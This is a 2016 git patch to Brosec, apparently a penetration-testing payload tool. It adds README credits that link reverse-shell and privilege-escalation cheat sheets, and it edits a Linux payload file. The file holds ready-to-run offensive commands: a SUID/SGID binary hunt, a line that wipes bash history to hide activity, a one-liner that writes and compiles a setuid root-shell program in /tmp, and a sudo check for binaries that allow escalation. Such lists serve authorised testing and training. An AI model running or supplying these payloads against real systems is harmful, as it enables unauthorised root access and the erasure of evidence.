From e9dda63ed58c2201b12f0dff4e0ec14b080315fd Mon Sep 17 00:00:00 2001 From: gabemarshall Date: Wed, 29 Jun 2016 09:50:41 -0400 Subject: [PATCH] Minor improvements to a few payloads, added a Credits section to the README --- README.md | 12 ++++++++++++ payloads/linux.js | 16 +++------------- 2 files changed, 15 insertions(+), 13 deletions(-) diff --git a/README.md b/README.md index d7e9fb0..ea58de7 100644 --- a/README.md +++ b/README.md @@ -104,3 +104,15 @@ Swag

Submit a pull request, create an issue, or just send feedback to and I'll happily send you a sticker (supplies limited, free shipping to continental US only). Otherwise you can order one from [StickerMule](https://www.stickermule.com/marketplace/10877-brosec-security-for-bros) + + +Credits +====== + +Brosec was heavily inspired by the Red Team Field Manual by Ben Clark. In addition, many payloads were referenced from other resources and deserve a shoutout. + +- [pentestmonkey reverse shells](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) +- [g0tmi1k linux privesc](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) +- [obsecuresecurity](http://obscuresecurity.blogspot.com/2014/05/dirty-powershell-webserver.html) + +Special thanks to [@LuxCupitor](https://twitter.com/LuxCupitor) diff --git a/payloads/linux.js b/payloads/linux.js index 3ae9c60..b3fb45b 100644 --- a/payloads/linux.js +++ b/payloads/linux.js @@ -83,8 +83,8 @@ Load({ // Linux File Commands pg 6 Load({ payload: "diff file1 file2", desc: "Compare two files", category: "File System"}) Load({ payload: "strings -n 5", desc: "Set minimum string length", category: "File System"}) -Load({ payload: "find / -perm +6000 -type f -exec ls -ld {} \\;", desc: "Find all SUID binaries", category: "File System"}) -Load({ payload: "find . -type f -mmin -5 -not -path \"*/proc/*\" 2>/dev/null", desc: "Find all files modified in the last 5 minutes", category: "File System"}) +Load({ payload: "find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \\; 2>/dev/null", desc: "Find all SUID and SGID files", category: "File System"}) +Load({ payload: "find . -type f -mmin -5 2>/dev/null", desc: "Find all files modified in the last 5 minutes", category: "File System"}) Load({ desc: "Find files and grep results", @@ -218,20 +218,10 @@ Load({ payload: "rm -rf ~/.bash_history && ln -s ~/.bash_history /dev/null", des // ############### Privesc ###################### -// Load({ -// desc: "Find files and grep results", -// payload: "find . -type f -exec grep -IHin '' 2>/dev/null {} +", -// callback: function(bro){ -// question("What search term would you like to use?"); -// ask.some(questions, bro); -// }, -// category: "File System" -// }) - // Credit to @LuxCupitor Load({ title: "Write r00t.c to the /tmp directory and compile", payload: "echo -e '#include \\nint main(int argc, char **argv)\\n{\\nsetuid(0);\\nsetgid(0);\\nexecl(\"/bin/sh\", \"sh\", NULL);\\nreturn 1;\\n}\\n' > /tmp/r00t.c;gcc /tmp/r00t.c -o /tmp/r00t", category: "Privesc"}) Load({ title: "Check for privesc via sudo privileges", payload: "sudo -S -l 2>/dev/null | grep -w 'nmap\\|perl\\|awk\\|find\\|bash\\|sh\\|man\\|more\\|less\\|vi\\|vim\\|nc\\|netcat\\|python\\|ruby\\|lua\\|irb\\|chown\\|chmod\\|zip\\|tar\\|tcpdump\\|gdb'", category: "Privesc"}) -// +// /* ###################################################### ############### End of Payloads ######################